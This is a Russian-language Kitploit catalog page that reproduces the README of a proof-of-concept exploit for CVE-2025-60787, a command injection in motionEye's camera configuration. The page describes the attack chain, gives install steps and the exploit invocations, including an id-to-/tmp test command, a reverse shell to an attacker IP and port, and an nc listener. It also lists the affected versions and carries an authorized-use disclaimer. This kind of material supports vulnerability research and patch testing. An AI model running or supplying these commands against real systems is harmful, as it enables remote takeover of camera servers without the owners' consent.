Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-60787 — CVE-2025-60787 motionEye: аутентифицированная инъекция команд — RCE PoC | Kitploit
Инструменты/GitHubGitHub/ozcanpng/cve-2025-60787
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubozcanpng/cve-2025-60787

CVE-2025-60787

CVE-2025-60787 motionEye: аутентифицированная инъекция команд — RCE PoC

Репозиторий
112 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-60787 — motionEye аутентифицированный RCE

Аутентифицированный PoC для инъекции команд в CVE-2025-60787. motionEye v0.43.1b4 и более ранние версии записывают управляемые пользователем значения конфигурации камеры, такие как image_file_name, в конфигурацию Motion без достаточной санитизации, что позволяет выполнять команды при обработке этого значения.

Только для авторизованного тестирования и исследований. Не используйте против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.


Что делает

Signed API request -> camera config update -> image_file_name injection -> snapshot trigger -> command execution
  1. Проверяет цель и обнаруживает motionEye.
  2. Генерирует подписанные API-запросы motionEye с использованием заданных имени пользователя и хеша пароля.
  3. Читает конфигурацию камеры через /config/list/.
  4. Внедряет команду в параметр камеры image_file_name.
  5. Включает неподвижные изображения/ручные снимки там, где это необходимо.
  6. Запускает /action/<camera_id>/snapshot/, чтобы motionEye обработал внедрённое имя файла.
  7. Опционально восстанавливает исходную конфигурацию камеры.

Скриншоты

Настройка reverse shell

Настройка reverse shell

Внедрение конфигурации и запуск

Внедрение конфигурации и запуск

Получена оболочка

Получена оболочка


Установка

git clone https://github.com/ozcanpng/CVE-2025-60787.git
cd CVE-2025-60787
pip install -r requirements.txt

Использование

Безопасная проверка команды

python3 CVE-2025-60787.py \
  --target http://127.0.0.1:8765 \
  --user admin \
  --password-hash HASH \
  --cmd 'id > /tmp/motioneye_rce'

Reverse shell

Сначала запустите слушатель:

rlwrap nc -lvnp 4444

Затем выполните:

python3 CVE-2025-60787.py \
  --target http://127.0.0.1:8765 \
  --port 8765 \
  --user admin \
  --password-hash HASH \
  --reverse-shell \
  --lhost 10.10.16.53 \
  --lport 4444

Полезные опции:

--camera-id N      Идентификатор камеры для изменения (по умолчанию: 1)
--restore          Восстановить исходную конфигурацию камеры после срабатывания
--dry-run          Сформировать подписанные запросы без изменения цели
--debug            Выводить канонические подписанные пути, тела и подписи
--no-trigger       Обновить конфигурацию без запуска снимка
--verify-tls       Проверять HTTPS-сертификаты
--yes              Пропустить запрос подтверждения reverse shell

Затронутые версии

ПродуктЗатронутая версияТребуемый доступВоздействие
motionEye<= 0.43.1b4Аутентифицированный доступ администратора/APIВыполнение OS-команд от пользователя процесса motionEye/Motion

Итоговые привилегии зависят от способа развёртывания motionEye. В контейнерах или лабораторных образах, где сервис запущен от root, выполнение команд может происходить с правами root.


Примечания

  • PoC ожидает сохранённое значение/хеш пароля motionEye, поскольку это значение используется в качестве ключа подписи для устаревших API-запросов.
  • Внедряемое поле — image_file_name.
  • Используйте --restore во время тестирования, чтобы вернуть исходную конфигурацию камеры после эксплуатации.
  • Для безопасной проверки перед попыткой reverse shell предпочтительно использовать --cmd.

Ссылки

  • NVD — CVE-2025-60787
  • GitHub Security Advisory — GHSA-j945-qm58-4gjx
  • Проект motionEye

Автор

ozcanpng — github.com/ozcanpng — ozcanpng.dev

Скачать инструмент